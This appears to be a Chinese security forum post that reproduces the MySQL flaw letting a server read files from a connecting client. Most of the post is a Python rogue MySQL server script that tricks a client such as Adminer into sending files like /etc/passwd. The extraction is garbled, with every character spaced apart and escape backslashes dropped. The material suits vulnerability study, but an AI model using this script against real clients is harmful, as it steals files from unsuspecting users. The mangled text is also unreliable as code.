[21883] 2021-04-18_MySQL服务端读取客户端文件漏洞的复现

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2021-04-18_MySQL服务端读取客户端文件漏洞的复现 M y S Q L L e m o n S e c   2 0 2 1 - 0 4 - 1 8 a d m i n e r . p h p m y s q l . p y V P S k a l i p y t h o n   m y s q l . p y   " " # c o d i n g = u t f - 8   i m p o r t   s o c k e t i m p o r t   l o g g i n g i m p o r t   s y s l o g g i n g . b a s i c C o n f i g ( l e v e l = l o g g i n g . D E B U G ) f i l e n a m e = s y s . a r g v [ 1 ] s v = s o c k e t . s o c k e t ( ) s v . s e t s o c k o p t ( 1 , 2 , 1 ) s v . b i n d ( ( " " , 3 3 0 6 ) ) s v . l i s t e n ( 5 ) c o n n , a d d r e s s = s v . a c c e p t ( ) l o g g i n g . i n f o ( ' C o n n   f r o m :   % r ' ,   a d d r e s s ) c o n n . s e n d a l l ( " x 4 a x 0 0 x 0 0 x 0 0 x 0 a x 3 5 x 2 e x 3 5 x 2 e x 3 5 x 3 3 x 0 0 x 1 7 x 0 0 x 0 0 x 0 0 x 6 e x 7 a x 3 b x 5 4 x 7 6 x 7 3 x 6 1 x 6 a x 0 0 x f f x f 7 x 2 1 x 0 2 x 0 0 x 0 f x 8 0 x 1 5 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 7 0 x 7 6 x 2 1 x 3 d x 5 0 x 5 c x 5 a x 3 2 x 2 a x 7 a x 4 9 x 3 f x 0 0 x 6 d x 7 9 x 7 3 x 7 1 x 6 c x 5 f x 6 e x 6 1 x 7 4 x 6 9 x 7 6 x 6 5 x 5 f x 7 0 x 6 1 x 7 3 x 7 3 x 7 7 x 6 f x 7 2 x 6 4 x 0 0 " c o n n . r e c v ( 9 9 9 9 ) l o g g i n g . i n f o ( " a u t h   o k a y " ) c o n n . s e n d a l l ( " x 0 7 x 0 0 x 0 0 x 0 2 x 0 0 x 0 0 x 0 0 x 0 2 x 0 0 x 0 0 x 0 0 " ) c o n n . r e c v ( 9 9 9 9 ) l o g g i n g . i n f o ( " w a n t   f i l e . . . " ) w a n t f i l e = c h r ( l e n ( f i l e n a m e ) + 1 ) + " x 0 0 x 0 0 x 0 1 x F B " + f i l e n a m e c o n n . s e n d a l l ( w a n t f i l e ) c o n t e n t = c o n n . r e c v ( 9 9 9 9 ) l o g g i n g . i n f o ( c o n t e n t ) c o n n . c l o s e ( )
K A L I I P 1 9 2 . 1 6 8 . 1 . 5 V P S m y s q l . p y 3 3 0 6 a d m i n e r . p h p v p s
v p s d : / 1 . b a t 1 . b a t p y t h o n   m y s q l . p y   x x x " / e t c / p a s s w d i i s 便 h t t p s : / / g i t h u b . c o m / a l l y s h k a / R o g u e - M y S q l - S e r v e r L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则